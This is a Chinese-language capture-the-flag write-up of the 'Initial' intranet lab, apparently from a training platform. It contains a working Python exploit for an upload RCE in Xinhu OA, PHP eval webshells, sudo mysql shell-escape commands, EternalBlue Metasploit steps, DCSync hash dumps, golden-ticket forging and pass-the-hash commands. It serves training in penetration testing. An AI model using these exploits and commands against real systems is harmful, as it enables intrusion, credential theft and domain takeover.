【春秋云镜】仿真场景-Initial靶场
0x01 靶标介绍
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
标签:DCSync;CVE;域渗透
0x02 操作步骤
flag01
信息收集
所给ip:39.98.246.186
进入靶场界面:
使用fscan扫描
fscan64.exe -h 39.98.246.186
发现80端口开放,指纹识别为thinkphp5.0.23,存在RCE
漏洞利用
直接使用利用工具
蚁剑连接
发现权限只有 www-data
sudo提权
查看sudo可执行的命令
sudo -l
发现mysql可以进行免密使用
查找flag
sudo mysql -e '\! find / -name flag*'
找到flag01
获取flag01
sudo mysql -e '\! cat /root/flag/flag01.txt'
flag02
内网扫描
查看网卡
发现内网网段 172.22.1.0/24
上传fscan工具进行扫描
chmod +x fscan_386 // 赋予执行权限
./fscan_386 -h 172.22.1.0/24
查看result.txt文件:
内网信息如下:
172.22.1.2 DC
172.22.1.21 MS17-010
172.22.1.18 信呼OA
内网代理
使用NPS代理
服务端:vps新建客户端,新建socks隧道
客户端:上传npc压缩包到靶机,解压后直接使用无配置文件模式连接
tar -zxvf linux_386_client.tar.gz
// sudo mysql -e '\! ./npc install'
// sudo mysql -e '\! ./npc start'
sudo mysql -e '\! ./npc -server=vps_ip:port -vkey=xxxxxx -type=tcp'
信呼OA RCE
进入网站界面如下:
弱口令登录
admin
admin123
漏洞利用参考:https://blog.csdn.net/solitudi/article/details/118675321
exp.py:
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
同目录下建立1.php木马:
<?php eval($_GET["1"]);?>
<?php eval($_POST["1"]);?>
执行:
python3 exp.py
原木马使用GET获取参数,可以方便脚本执行获取上传文件路径,但蚁剑连接时一直报错;后使用POST请求的木马上传,发现通过报错也可得知上传文件路径,同时可以连接上蚁剑。
得到上传路径后使用蚁剑连接,找到flag02:
flag03
MS17-010利用
linux中设置代理
vim /etc/proxychains4.conf
使用msf攻击
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
横向移动
利用DCSync
load kiwi
导出域内所有用户Hash
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1000 DC01$ d75bd2d4524fcaee3946250f675aebf7 532480
1108 XIAORANG-WIN7$ 8b7dea43bed4b560504e925f0f1b5efd 4096
1104 XIAORANG-OA01$ fd2dbb99c526e5969d540669a099d158 4096
生成黄金票据
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2022/6/5 20:40:39
Object Security ID : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID : 502
Credentials:
Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
lm - 0: c4f45322c850c77aecb3aa71c2e44c1e
导入黄金票据
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
wmiexec哈希传递
wmiexec.exe -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"
找到flag03:
0x03 靶场总结
首次尝试本地环境外的内网渗透靶场,还有点磕磕盼盼,但熟悉了一遍内网渗透流程。刚开始只打下了flag01,主要在代理穿透时卡了很久,尝试了ew、iox、Neo-reGeorg等方法但效果不太理想,网络有时也有点卡,后来使用nps把流量通过vps带出来的,算是把代理技术都再熟悉了一遍,还有其他一些小细节问题,但总体来说还是收获颇多。
参考wp:https://blog.csdn.net/qq_45234543/article/details/127904572
https://zhuanlan.zhihu.com/p/581432196